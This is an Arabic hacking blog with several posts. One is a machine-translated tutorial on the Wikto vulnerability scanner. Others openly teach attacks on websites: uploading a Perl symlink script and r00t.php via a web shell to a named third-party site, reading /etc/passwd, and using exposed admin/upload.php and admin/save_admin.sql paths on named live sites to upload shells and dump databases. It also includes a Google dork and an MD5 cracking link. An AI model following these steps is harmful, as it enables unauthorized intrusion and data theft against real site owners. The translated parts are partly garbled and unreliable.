وهنا ترى الثغرات الخطيرة باللون الاحمر والمتوسطه باللون البرتقالي والاقل خطورة باللون الاصفر
كما تجد بالاسفل شرح للثغرة ومدى خطورتها
والان كل ما عليك هو استغلال هذه الثغرات
وسنشرح باذن الله تعالى كيفية استغلال كل ثغره
البرنامج موجود بالموقع الروسى safety lab


حجمه تقريبا البرنامج
15.3 MB
ويوجد ملفات اخره لزم تنزلها

كيفية البحث عن الثغرات عن طريق الموقع Wikto

عندما نحاول إيجاد نقاط الضعف في موقع على شبكة الانترنت للهجوم، ونحن بحاجة إلى خادم الويب الصلبة الماسح الضوئي الضعف. يمكن أن تطبيقات الويب التي تواجه الإنترنت فتح فرص هائلة بالنسبة لنا وغالبا ما يعصف أنها مع نقاط الضعف ويمكن غالبا ما تقدم نقطة بأكملها إلى شبكة والموارد الداخلية
في السابق، كنت قد أظهر لك كيفية استخدام nikto في كالي للعثور على الثغرات الموقع، ولكن أنا هنا سوف تظهر لك أداة يستند إلى Windows دعا Wikto أن يشمل جميع من قدرات سطر الأوامر nikto بيرل النصي ولكن مع استخدام سهلة واجهة المستخدم الرسومية والميزات الموسعة
العديد من فوائد Wikto
تابع هن
يتم اكتشاف نقاط الضعف في مختلف البرامج النصية على شبكة الإنترنت على أساس منتظم، وWikto يمكن أن تساعدك على العثور على مثل هذه العيوب على الهدف الخاص بك. وقد كتب هذه الأداة من قبل Sensepost، وهي شركة خدمات أمنية ومقرها في جنوب أفريقيا
مثل nikto، Wikto بالبحث عن الآلاف من النصوص المعيبة، خادم الخاطئة الشائعة، ونظم غير المصلحة. Wikto يضيف HTTP التكنولوجيا البصمات لتحديد أنواع خوادم الويب على أساس بروتوكول السلوكيات الخاصة بهم، حتى لو الإداريين تخفي عمدا معلومات راية خادم الويب لخداع المهاجمين
ما هو أكثر من ذلك، المهاجمين يتحولون بشكل متزايد إلى ضعت على نحو جيد بحث Google للبحث عن المواقع المعرضة للخطر. يحتفظ الباحث الأمني ​​جوني طويل القائمة قاعدة بيانات جوجل التقطيع (GHDB) أكثر من 1،000 نتائج بحث Google التي يمكن تحديد أنظمة الملفات والضعيفة. Wikto يمكن استيراد أحدث قائمة الضعف GHDB، ثم الاستعلام جوجل لمثل هذه الثقوب في المجال الهدف الخاص بك
بالإضافة إلى ذلك، Wikto قادر على الاستعلام عن الواجهة الخلفية من الانترنت للعثور على أدلة وملفات. بهذه الطريقة، يمكننا الحصول على فكرة عما الدلائل والملفات وراء الموقع وما الإختراق للعثور على البيانات السرية أو الخفية
أخيرا، يمكن Wikto العنكبوت الموقع والعثور على كافة الروابط المضمنة في الموقع
الآن، دعونا نبدأ مع Wikto!
الخطوة 1: تحميل Wikto
كما ذكر أعلاه، وقد وضعت Wikto من nikto لينكس ويندوز عن طريق Sensepost ونظرا القدرات الإضافية التي لا توجد في nikto نفسها. أعطت الناس في Sensepost أنه واجهة المستخدم الرسومية ممتازة ونسبيا سهلة الاستخدام، ويمكنك تحميله من هنا
الخطوة 2: فتح Wikto
عندما كنا انقر على Wikto، ونحن في استقبال الشاشة التالية. للبدء، نحن بحاجة إلى اختيار الخدمات التي من Wikto نريد استخدام أولا. دعونا نبدأ مع علامة التبويب Wikto بالقرب من مركز شريط القائمة العلوية. هذا الماسح الضوئي الضعف على أساس nikto

Friday, 11 September 2015

كيف تكتب اسم الثغره والبحث عنها بعده مسميات معي هكركوز الكويت تعلم gaps و gap و Exploitation و exploit

اليوم مهنا موضوع يحبه الجميع في اكتشاف ثغره ويبدع في الاختراق لاي سكربت مرفوع
للمحترفين سهل والمبتدي يتابع شروحي

تابعوا الدرس

Saturday, 2 May 2015

شرح مهداه للجميع وبمقطع اعجبني بس غير شامل بالتطبيق لـ Cloudx سحب الروت Root والكونفيج Configs

اول مشكور للاخ اللى عجبني مقطعه بالشرح ولكن لم يكمل التطبيق بالسليم
Cloudx -- سحب الروت Root والكونفيج Configs
اليوم بشرح لكم التطبيق بكل محاولت اختراق اي موقع لزم تغير المسار اللى بقالب البيرل وهو مهم جدا
perl
عند اربع 4 روابط موجوده عليك بتغير الى مسار الموقع المستهدف لاختراقه وقرائهـ محتواه ليسهل عليك الاختراق نتابع الصوره
 الصوره تشرح الامر في كل اختراق لموقع معين عليك بتغير الرابط فقط
http://mail.nexus-roleplay.de/mysql/kuwait
وعند الرفع للاداء البيرل وتشغيله بالمتصفح يعطيك الناتج هذا بالنجاح
kw Has Been Created تم الانشاء!
[htaccess] => Has Been Created !
[cgi] => Has Been Created تم الانشاء!
[config] => Has Been Created تم الانشاء!
[users] => Has Been Created تم الانشاء!
[CGI] => CHMOD To 755 Complate تم الانشاء!
[Config] => CHMOD To 755 Complate تم الانشاء!
[Users] => CHMOD To 755 Complate تم الانشاء!
وبعدها تقوم بتشغيل الروت بهذا المسار
r00t.php
وتضغط المهم فقط
بعدها راح تشاهد هذي المجلدات ومبروك
الان نرجع لشيلنا ... في وضع الاوامر ونتابع
اول الاوامر لتأمين ان الوضع لشرح شغال ضع
cat /etc/passwd
ونقطه انتباااااه : في مجلد
sym
قوم بالتطبيق من طريق الشيل افضل ...
واذا لم يعمل معك التطبيق ويوجد خطئ انتبهـ <<< بملف الهتكس
 .htaccess
تغير محتواه ..
لم انجه في التطبيق لان الدرس شبه فاشل
وبعض المواقع لا يقاوم الرفع لشيل اللى فيه اوامر اقوي مثال شيل السفراني
يقوم الموقع بمنع الرفع ...

المهم شرحه ما فيه الكفايه وتابعوا معي موضوع الشيلات

Monday, 13 April 2015

ثغره سحب القاعده والبيانات الموجوده مع التشفير يحتاج برنامج التشفير admin/save_admin.sql

رفع صفحتك
admin/upload.php
سحب القاعده والبيانات الموجوده مع التشفير يحتاج برنامج التشفير
admin/save_admin.sql
بحث عن رفعك اتبع
admin/files/
دخول التسجيل
admin/admin.php
نوع السكربت مجهول لم اعرفه بس تعال لموقع هذا لتعرف عليه ؟؟؟
http://www.micro-golf.net/
http://www.waterview89.com/
شفر بهذا
http://md5.benramsey.com/
طريقه البحث
Index of /admin/files/
ممنوع رفعها
http://files.gratisupload.dk/1190999706_RVcxYJq8.phtml?tmp

رابط اكتشاف